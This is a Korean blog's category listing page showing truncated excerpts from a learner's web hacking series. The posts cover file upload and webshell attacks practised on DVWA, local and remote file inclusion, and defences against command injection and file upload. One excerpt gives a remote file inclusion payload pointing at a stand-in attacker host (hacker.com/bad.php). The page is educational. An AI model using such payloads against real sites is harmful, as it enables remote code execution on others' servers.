728x90 해킹10 파일 업로드 대응 방법 파일 업로드에 대해 모르신다면 아래 포스팅으로 보고 와주세요ㅎㅎ https://com24everyday.tistory.com/39 파일 업로드 공격 오늘은 파일 업로드 공격을 배워보겠습니다. 파일 업로드 공격이란 파일이 업로드 될 수 있는 페이지에 악성 파일(웹쉘)을 업로드하는 것 입니다. 웹쉘이란 커맨드 인젝션에서 본 것과 비슷하게 웹을 통해 시스템.. com24everyday.tistory.com 보면 이미지 파일의 내용을 확인하여 겉모습만 이미지 파일인 것들을 걸러주고 있습니다. 또 다른 방법으로는 업로드 되는 파일을 랜덤하게 생성시켜서 해커가 자기가 업로드한 파일에 접근하지 못하게 하는 방법입니다. 또 업로드 서버와 웹애플리케이션 서버와 분리하는 방법이 있습니다. 이 방법들이 다 안되면 업로드 폴.. 2020. 5. 6. 파일 업로드 공격 오늘은 파일 업로드 공격을 배워보겠습니다. 파일 업로드 공격이란 파일이 업로드 될 수 있는 페이지에 악성 파일(웹쉘)을 업로드하는 것 입니다. 웹쉘이란 커맨드 인젝션에서 본 것과 비슷하게 웹을 통해 시스템 명령어를 실행할 수 있는 페이지 입니다. 실습을 해보도록 하겠습니다. dvwa 를 열고 보안 등급을 low 로 해주세요. 웹쉘 파일 올려보겠습니다. 저희가 사용할 웹쉘의 내용은 이러합니다. php 프로그램으로 초반엔 커맨드를 입력해라는 내용과 사용자 입력을 받기 위한 폼을 표시하는 html 를 출력하고 cmd 라는 값이 설정되어있으면 system 이란 함수로 실행되는 내용입니다. 즉 사용자가 입력한 명령어를 실행하게 됩니다. https://github.com/SecuAcademy/webhacking/b.. 2020. 5. 6. 파일 인클루젼 공격 안녕하세요. 오늘은 파일 인클루젼 공격에 대해 알아보겠습니다. 파일 인클루젼 공격은 주로 PHP Application 에서 발생합니다. 그 이유는 PHP include() 로 앱 요청을 지정할 수 있다면 파일을 직접 소스코드에 삽입할 수 있기 때문입니다. -로컬파일인클루젼(LFI) : 웹 서버에 이미 존재하고 있는 파일을 인클루드 -리모트파일인클루젼(RFI) : LFI 보다 더 강력한 공격으로 원격으로 외부에 있는 파일을 인클루드 정상적 웹 사이트 page=file.php 이렇게 파일을 인클루드 하는데 해커는 자신의 사이트를 통해 page = htpp://hacker.com/bad.php 인클루드 시켜버립니다. 만약 검사를 따로 하지 않는다면 웹 사이트는 그대로 악성코드를 실행시키게 되는 겁니다. 이제 .. 2020. 5. 4. 커맨드 인젝션 공격 대응 https://com24everyday.tistory.com/32?category=1114111 커맨드인젝션 공격 안녕하세요. 부산 공수니입니다. 오늘은 '커맨드 인젝션'에 대해 알아보겠습니다. 바로 Go. 컨맨드 인젝션은 명령어를 삽입한다는 뜻으로 웹을 통해 시스템 명령어를 실행하는 공격입니다. 만약 웹 내부에서 시스.. com24everyday.tistory.com 커맨드 인젝션 공격 대응을 알아보겠습니다! 커맨드 인젝션을 잘 모르시는 분은 위 포스팅으로 갔다와주세요ㅎㅎ 커맨드 인젝션에 가장 좋은 대응 방안은 입력 값이 적절한 값인지 조사하는 것 입니다. DVWA 에서 했듯이 IP 주소를 입력받는 거라면 입력값이 실제로 IP 주소인지 검증하는 과정이 들어가면 좋습니다. DVWA 의 'impossibl.. 2020. 5. 2. 이전 1 2 3 다음 728x90
